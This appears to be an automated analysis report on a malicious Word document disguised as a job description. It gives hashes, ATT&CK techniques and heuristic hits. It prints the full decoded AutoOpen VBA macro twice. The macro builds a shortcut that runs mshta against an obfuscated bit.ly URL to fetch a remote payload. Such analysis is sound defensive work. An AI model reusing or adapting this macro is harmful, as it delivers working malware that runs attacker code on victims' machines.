Office (OLE) malware analysis — malicious · 7446efa798cfa790

MALICIOUS

Office (OLE)

282.5 KB Created: 2019-01-07 13:11:00 Authoring application: Microsoft Office Word First seen: 2020-09-15

MD5: cd0a391331c1d4268bd622080ba68bce SHA-1: da013027c7f534321c940f2047354359d7b32480 SHA-256: 7446efa798cfa7908e78e7fb2bf3ac57486be4d2edea8a798683c949d504dee6

330 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a Word document containing a VBA macro that executes upon opening. The macro utilizes WScript.Shell to create a shortcut file named 'esk.lnk' which, when executed by 'explorer', launches 'mshta.exe' with a URL pointing to 'https://bit.ly/2vwLE0m'. This URL likely hosts a second-stage payload. The document body presents a fake job description to trick the user into opening the malicious file.

Heuristics 10

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

    ExPath = "explorer " & LPath
    Set SHH = CreateObject("wscript.shell")
    Set LKO = SHH.CreateShortcut(LPath)

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

    Set LKO = SHH.CreateShortcut(LPath)
    LKO.TargetPath = "mshta"
    LKO.Arguments = "ht" & "tps:/" & "/bi" & "t.ly/" & "2vwLE0m"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    On Error Resume Next
    Set FSS = CreateObject("Scripting.FileSystemObject")
    LPath = FSS.GetSpecialFolder(2) & "\esk.l" & "nk"

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    On Error Resume Next

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Reference to mshta.exe high SC_STR_MSHTA

Reference to mshta.exe
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://www.blockverify.com In document text (OLE body)
- https://www.BlockVerify.comIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1259 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1259 bytes
SHA-256: `6d2001b75ce7d1fce6725d896b7d82ba81e1515c8dd28d5647515038a0e1c3e1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub AutoOpen() On Error Resume Next Set FSS = CreateObject("Scripting.FileSystemObject") LPath = FSS.GetSpecialFolder(2) & "\esk.l" & "nk" ExPath = "explorer " & LPath Set SHH = CreateObject("wscript.shell") Set LKO = SHH.CreateShortcut(LPath) LKO.TargetPath = "mshta" LKO.Arguments = "ht" & "tps:/" & "/bi" & "t.ly/" & "2vwLE0m" LKO.Save SHH.Run ExPath ActiveDocument.Content.Font.Color = 0 ActiveDocument.ActiveWindow.View.Type = wdPrintView ActiveDocument.Content.Font.Size = 12 Dim Splash As Shape For Each Splash In ActiveDocument.Shapes If Splash.AlternativeText = "G" & "DP" & "R" Then Splash.Width = Splash.Height = 0 End If Next Splash ActiveDocument.ActiveWindow.View.ShowHiddenText = False ActiveDocument.ActiveWindow.View.ReadingLayout = False ActiveDocument.Content.Font.Hidden = False End Sub

SHA-256: 6d2001b75ce7d1fce6725d896b7d82ba81e1515c8dd28d5647515038a0e1c3e1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    On Error Resume Next
    Set FSS = CreateObject("Scripting.FileSystemObject")
    LPath = FSS.GetSpecialFolder(2) & "\esk.l" & "nk"
    ExPath = "explorer " & LPath
    Set SHH = CreateObject("wscript.shell")
    Set LKO = SHH.CreateShortcut(LPath)
    LKO.TargetPath = "mshta"
    LKO.Arguments = "ht" & "tps:/" & "/bi" & "t.ly/" & "2vwLE0m"
    LKO.Save
    SHH.Run ExPath
    ActiveDocument.Content.Font.Color = 0
    ActiveDocument.ActiveWindow.View.Type = wdPrintView
    ActiveDocument.Content.Font.Size = 12
    Dim Splash As Shape
    For Each Splash In ActiveDocument.Shapes
        If Splash.AlternativeText = "G" & "DP" & "R" Then
            Splash.Width = Splash.Height = 0
        End If
    Next Splash
    ActiveDocument.ActiveWindow.View.ShowHiddenText = False
    ActiveDocument.ActiveWindow.View.ReadingLayout = False
    ActiveDocument.Content.Font.Hidden = False
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.